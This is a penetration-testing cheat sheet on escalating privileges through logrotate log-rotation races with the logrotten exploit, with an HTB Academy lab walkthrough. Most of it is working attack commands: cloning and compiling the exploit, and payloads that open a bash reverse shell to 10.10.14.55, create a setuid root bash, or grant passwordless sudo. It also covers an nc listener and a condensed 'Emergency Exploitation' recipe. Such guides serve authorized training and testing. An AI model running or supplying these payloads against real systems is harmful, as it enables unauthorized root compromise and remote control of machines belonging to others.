📜Logrotate Exploitation

🎯 Overview

Logrotate vulnerability (CVE-2011-1548, CVE-2011-1154) in specific versions allows privilege escalation through log file manipulation and race condition exploitation.

🔍 Prerequisites

Required Conditions

# 1. Write permissions on log files
ls -la /var/log/ | grep $(whoami)

# 2. Vulnerable logrotate version
logrotate --version
# Vulnerable: 3.8.6, 3.11.0, 3.15.0, 3.18.0

# 3. Logrotate runs as root (via cron)
ps aux | grep logrotate
cat /etc/cron.daily/logrotate

Configuration Analysis

# Check logrotate configuration
cat /etc/logrotate.conf

# Important settings
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

# Check specific log configurations  
ls /etc/logrotate.d/
cat /etc/logrotate.d/*

🚀 Exploitation with Logrotten

Download and Compile Exploit

# Get logrotten exploit
git clone https://github.com/whotwagner/logrotten.git
cd logrotten

# Compile exploit
gcc logrotten.c -o logrotten

Create Payload

# Simple reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.14.55/1222 0>&1' > payload

# Alternative payloads
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > payload
echo 'echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > payload

Execute Exploit

# Setup listener on attacker machine
nc -nlvp 9001

# Run logrotten exploit
./logrotten -p ./payload /tmp/tmp.log

# For create mode (most common)
./logrotten -p ./payload /var/log/dpkg.log

# Wait for logrotate execution (usually daily)

HTB Academy Lab Example

# 1. Transfer exploit to target
git clone https://github.com/whotwagner/logrotten.git
scp -r logrotten/ htb-student@target:~/

# 2. Compile on target
ssh htb-student@target
cd logrotten/
gcc -o logrotten logrotten.c

# 3. Create payload for flag extraction
echo "cat /root/flag.txt > /home/htb-student/flag.txt" > payload

# 4. Trigger exploit
echo test >> /home/htb-student/backups/access.log
./logrotten /home/htb-student/backups/access.log -p payload

# 5. Read extracted flag
cat /home/htb-student/flag.txt

🔧 Configuration Mode Detection

Determine Logrotate Mode

# Check main config for mode
grep "create\|compress" /etc/logrotate.conf

# Common modes:
# create    - Creates new log file with specified permissions
# compress  - Compresses old log files

Mode-Specific Exploitation

# For create mode
./logrotten -p ./payload /target/log/file

# For compress mode  
./logrotten -c -p ./payload /target/log/file

🕐 Timing and Execution

Cron Schedule Analysis

# Check when logrotate runs
cat /etc/cron.daily/logrotate
cat /etc/cron.d/ | grep logrotate

# Check last rotation status
cat /var/lib/logrotate.status

Manual Triggering (if possible)

# Force logrotate execution (requires privileges)
sudo logrotate -f /etc/logrotate.conf

# Debug mode (safe testing)
logrotate -d /etc/logrotate.conf

🔍 Detection & Enumeration

Logrotate Vulnerability Check

#!/bin/bash
echo "=== LOGROTATE VULNERABILITY CHECK ==="

echo "[+] Logrotate version:"
logrotate --version

echo "[+] Vulnerable version check:"
version=$(logrotate --version 2>/dev/null | grep -oE "[0-9]+\.[0-9]+\.[0-9]+")
if echo "$version" | grep -qE "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"; then
    echo "  [!] VULNERABLE VERSION: $version"
fi

echo "[+] Writable log files:"
find /var/log -writable 2>/dev/null | head -10

echo "[+] Logrotate configuration:"
grep "create\|compress" /etc/logrotate.conf 2>/dev/null | grep -v "#"

echo "[+] Logrotate cron job:"
ls -la /etc/cron.daily/logrotate 2>/dev/null

Log File Analysis

# Find writable log files
find /var/log -type f -writable 2>/dev/null

# Check log file permissions
ls -la /var/log/ | grep $(whoami)

# Log rotation status
cat /var/lib/logrotate.status | head -10

🔑 Quick Reference

Immediate Checks

# Version vulnerability
logrotate --version | grep -E "(3\.8\.6|3\.11\.0|3\.15\.0|3\.18\.0)"

# Writable logs
find /var/log -writable 2>/dev/null

# Configuration mode
grep "create\|compress" /etc/logrotate.conf | grep -v "#"

Emergency Exploitation

# If vulnerable version + writable logs found
git clone https://github.com/whotwagner/logrotten.git
cd logrotten && gcc logrotten.c -o logrotten
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' > payload
./logrotten -p ./payload /writable/log/file

⚠️ Exploit Limitations

Requirements Summary

• Vulnerable logrotate version (specific versions only)

• Write permissions on target log files

• Logrotate execution as privileged user

• Timing dependency on cron schedule

Success Factors

• Daily cron execution - Most common schedule

• Large log files - More likely to trigger rotation

• Active logging - Files that actually get rotated

• Correct configuration mode - create vs compress

---

Logrotate exploitation leverages race conditions in log management - when logrotate runs as root with writable log files, the logrotten exploit can hijack the rotation process for privilege escalation.